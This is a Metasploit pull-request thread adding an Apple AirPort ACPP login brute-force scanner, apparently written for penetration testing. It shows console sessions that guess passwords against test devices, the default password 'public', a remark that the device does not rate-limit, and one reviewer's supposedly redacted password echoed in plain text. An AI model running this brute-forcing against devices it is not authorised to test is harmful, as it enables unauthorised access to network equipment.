### PR TITLE
Minimal Apple Airport Admin protocol (ACPP?) support, login brute forcing

### PR DESCRIPTION
**Pull request by jhart-r7**
This adds the beginnings of supporting the protocol that Apple uses to administer their various AirPort products along with a login scanner to brute force passwords on these devices.   There is almost no public documentation for this protocol so I've had to figure things out.

Dropping a bunch of passwords to try into `/tmp/pass`, we are able to successfully authenticate with 'public' which is the default password for all AirPorts. 

```
resource (/tmp/creds.rc)> workspace -d acpp
[*] Deleted workspace: acpp
resource (/tmp/creds.rc)> workspace -a acpp
[*] Added workspace: acpp
resource (/tmp/creds.rc)> use auxiliary/scanner/acpp/login
resource (/tmp/creds.rc)> set RHOSTS 10.0.1.1
RHOSTS => 10.0.1.1
resource (/tmp/creds.rc)> set PASS_FILE /tmp/pass
PASS_FILE => /tmp/pass
resource (/tmp/creds.rc)> run
[*] 10.0.1.1:5009  - Starting ACPP login sweep
[-] 10.0.1.1:5009  - ACPP LOGIN FAILED: wrong (Incorrect: Status code 4294967280)
[-] 10.0.1.1:5009  - ACPP LOGIN FAILED: verywrong (Incorrect: Status code 4294967280)
[+] 10.0.1.1:5009 - ACPP LOGIN SUCCESSFUL: public

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(login) > creds
Credentials
===========

host      service          public   private  realm  private_type
----      -------          ------   -------  -----  ------------
10.0.1.1  5009/tcp (acpp)  <BLANK>  public          Password

msf auxiliary(login) > show options

Module options (auxiliary/scanner/acpp/login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE         /tmp/pass        no        File containing passwords, one per line
   RHOSTS            10.0.1.1         yes       The target address range or CIDR identifier
   RPORT             5009             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   VERBOSE           true             yes       Whether to print output for all attempts
```

### CODE REVIEW

**Comment by todb-r7** [comment]
Travis is complaining about pry?

`/home/travis/build/rapid7/metasploit-framework/vendor/bundle/ruby/1.9.1/gems/activesupport-3.2.21/lib/active_support/dependencies.rb:251:in `require': cannot load such file -- pry (LoadError)`

https://travis-ci.org/rapid7/metasploit-framework/builds/46887345

**Comment by jhart-r7** [comment]
@todb-r7 , re: pry, I noticed that yesterday before the failure but forgot to push.  Should be fixed now.

**Comment by wchen-r7** [comment]
Hmm does anybody have an Apple Airport device for testing (that's in the office)?

**Comment by bcook-r7** [comment]
I have one at home, where I happen to be.

**Comment by bcook-r7** [comment]
Works for me:

```
msf > use auxiliary/scanner/acpp/login
msf auxiliary(login) > set RHOSTS 192.168.22.1
RHOSTS => 192.168.22.1
msf auxiliary(login) > info

       Name: Apple Airport ACPP Authentication Scanner
     Module: auxiliary/scanner/acpp/login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Jon Hart <jon_hart@rapid7.com>

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   false            no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_PASS       false            no        Add all passwords in the current database to the list
  PASSWORD                           no        A specific password to authenticate with
  PASS_FILE                          no        File containing passwords, one per line
  RHOSTS            192.168.22.1     yes       The target address range or CIDR identifier
  RPORT             5009             yes       The target port
  STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
  THREADS           1                yes       The number of concurrent threads
  VERBOSE           true             yes       Whether to print output for all attempts

Description:
  This module attempts to authenticate to an Apple Airport using its
  proprietary and largely undocumented protocol known only as ACPP.

References:
  http://cvedetails.com/cve/2003-0270/

msf auxiliary(login) > set PASSWORD redacted
PASSWORD => monkeybutt7923
msf auxiliary(login) > run

[*] 192.168.22.1:5009  - Starting ACPP login sweep
[+] 192.168.22.1:5009 - ACPP LOGIN SUCCESSFUL: redacted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(login) > set PASSWORD notit
PASSWORD => notit
msf auxiliary(login) > run

[*] 192.168.22.1:5009  - Starting ACPP login sweep
[-] 192.168.22.1:5009  - ACPP LOGIN FAILED: notit (Incorrect: Status code 4294967280)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

**Comment by bcook-r7** [comment]
A little sad that tilde expansion didn't work, (and that the Airport doesn't seem to rate-limit this stuff!) but that's probably not an issue with this module in particular:

```
msf auxiliary(login) > set PASS_FILE ~/passwords
PASS_FILE => ~/passwords
msf auxiliary(login) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: PASS_FILE.
msf auxiliary(login) > set PASS_FILE /Users/bcook/passwords
PASS_FILE => /Users/bcook/passwords
msf auxiliary(login) > run

[*] 192.168.22.1:5009  - Starting ACPP login sweep
[-] 192.168.22.1:5009  - ACPP LOGIN FAILED: monkey (Incorrect: Status code 4294967280)
[-] 192.168.22.1:5009  - ACPP LOGIN FAILED: cow (Incorrect: Status code 4294967280)
[-] 192.168.22.1:5009  - ACPP LOGIN FAILED: admin (Incorrect: Status code 4294967280)
[-] 192.168.22.1:5009  - ACPP LOGIN FAILED: diswhasher (Incorrect: Status code 4294967280)
[+] 192.168.22.1:5009 - ACPP LOGIN SUCCESSFUL: redacted
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

**Comment by jhart-r7** [comment]
Thanks for landing this, @bcook-r7

**Pull request merged**
